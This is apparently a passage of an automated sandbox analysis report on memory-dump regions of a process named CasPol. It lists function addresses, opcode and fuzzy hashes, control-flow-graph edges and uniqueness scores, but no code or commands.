                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167505560374.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_1910000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bbfed595308bf7995022767644fe7a8fd86259ba4435d12982fdd8649c17912c
                                                                      • Instruction ID: b5a10cf7f8147e252b2242243c195c7d1d985dc523d8f46216ea0427602d3139
                                                                      • Opcode Fuzzy Hash: bbfed595308bf7995022767644fe7a8fd86259ba4435d12982fdd8649c17912c
                                                                      • Instruction Fuzzy Hash: D91102393042508FC314DB39D95CA5E77E6FBCA614B1540A9E809CB791DF36EC8AC7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01910221 Relevance: .0, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1685 1910221-191024c 1686 1910254 1685->1686 1705 191024e call 16623f4 1685->1705 1706 191024e call 19102a9 1685->1706 1696 1910254 call 1930606 1686->1696 1697 1910254 call 19103f8 1686->1697 1698 1910254 call 19305df 1686->1698 1687 191025a 1699 191025c call 19104b0 1687->1699 1700 191025c call 19104a0 1687->1700 1688 1910262-1910266 1689 1910291 1688->1689 1690 1910268-191028f 1688->1690 1701 1910293 call 19104b0 1689->1701 1702 1910293 call 19104a0 1689->1702 1703 1910293 call 1930606 1689->1703 1704 1910293 call 19305df 1689->1704 1693 19102a0-19102a7 1690->1693 1692 1910299 1692->1693 1696->1687 1697->1687 1698->1687 1699->1688 1700->1688 1701->1692 1702->1692 1703->1692 1704->1692 1705->1686 1706->1686
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167505560374.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_1910000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 35a4b1dd16a5669df1175ec6d3dd736397d4e640c589a4094d034cf3ea05a26e
                                                                      • Instruction ID: de792247ef533be8aa60d6538e1f69258197c39413bbed983ed4dd0d6b499855
                                                                      • Opcode Fuzzy Hash: 35a4b1dd16a5669df1175ec6d3dd736397d4e640c589a4094d034cf3ea05a26e
                                                                      • Instruction Fuzzy Hash: A801B131A002148FCB68DF78DC089AE7BB5FB84320B11C67AE01AC7254DB358845CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01910230 Relevance: .0, Instructions: 42COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1707 1910230-191024c 1724 191024e call 16623f4 1707->1724 1725 191024e call 19102a9 1707->1725 1708 1910254 1726 1910254 call 1930606 1708->1726 1727 1910254 call 19103f8 1708->1727 1728 1910254 call 19305df 1708->1728 1709 191025a 1718 191025c call 19104b0 1709->1718 1719 191025c call 19104a0 1709->1719 1710 1910262-1910266 1711 1910291 1710->1711 1712 1910268-191028f 1710->1712 1720 1910293 call 19104b0 1711->1720 1721 1910293 call 19104a0 1711->1721 1722 1910293 call 1930606 1711->1722 1723 1910293 call 19305df 1711->1723 1715 19102a0-19102a7 1712->1715 1714 1910299 1714->1715 1718->1710 1719->1710 1720->1714 1721->1714 1722->1714 1723->1714 1724->1708 1725->1708 1726->1709 1727->1709 1728->1709
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167505560374.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_1910000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 765c77224c1c77eee7918a1f8ab840cec97be54158ce68cbdab2ce352d116d52
                                                                      • Instruction ID: eb6b5445ac041bf5a82a96b215f50d4ab7d77b67da23a13891c21153019e4dca
                                                                      • Opcode Fuzzy Hash: 765c77224c1c77eee7918a1f8ab840cec97be54158ce68cbdab2ce352d116d52
                                                                      • Instruction Fuzzy Hash: 2E016271A00218DFCB28DFB9DC489AF7BB5FB44321B10856AF41AD3354DB358994DB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01930606 Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1729 1930606-1930620 1730 1930626-1930643 1729->1730
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167505627694.0000000001930000.00000040.00000020.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_1930000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9a18b5f218df8b10050a6e01cf892b5d2d1074f6876d6823b76d69654ebfe398
                                                                      • Instruction ID: 50786f9621605c6a890506bc8b5f5857da9733f869328ef0a1dfc4ec938f8734
                                                                      • Opcode Fuzzy Hash: 9a18b5f218df8b10050a6e01cf892b5d2d1074f6876d6823b76d69654ebfe398
                                                                      • Instruction Fuzzy Hash: EBE092B66046008BD650CF0BEC42452F7D8EB84630708C07FDD0D8B704E2B5B505CAB5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 016623F4 Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1731 16623f4-16623ff 1732 1662412-1662417 1731->1732 1733 1662401-166240e 1731->1733 1734 166241a 1732->1734 1735 1662419 1732->1735 1733->1732 1736 1662420-1662421 1734->1736
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167504958255.0000000001662000.00000040.00000800.00020000.00000000.sdmp, Offset: 01662000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_1662000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c7bfbd8f4b37ac26cfdfb7b40e340455194a150954d989ea5d72ba5e8a079b38
                                                                      • Instruction ID: 8d8e33d0232c47172302ea889a2de71d16317f5921c8c3fd803bfe0ea8703004
                                                                      • Opcode Fuzzy Hash: c7bfbd8f4b37ac26cfdfb7b40e340455194a150954d989ea5d72ba5e8a079b38
                                                                      • Instruction Fuzzy Hash: C8D05E792066814FE3269A1CC5A8BA53BE8AF51714F4B44FDA8008B777C768D5D1D600
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 016623BC Relevance: .0, Instructions: 14COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167504958255.0000000001662000.00000040.00000800.00020000.00000000.sdmp, Offset: 01662000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_1662000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e374a9c0f43d3ff36c41058fb989354ababba22430de758bd7b4fb0ba1752d91
                                                                      • Instruction ID: eead4c2d6fe92d5f498859e837ef45fb3f015b7bbb329f20cdae0d02d629c176
                                                                      • Opcode Fuzzy Hash: e374a9c0f43d3ff36c41058fb989354ababba22430de758bd7b4fb0ba1752d91
                                                                      • Instruction Fuzzy Hash: D6D05E342002814BD725DB0CC6A4F5937E8AB44714F0644EDAC008B366C7A4D8C0DA00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%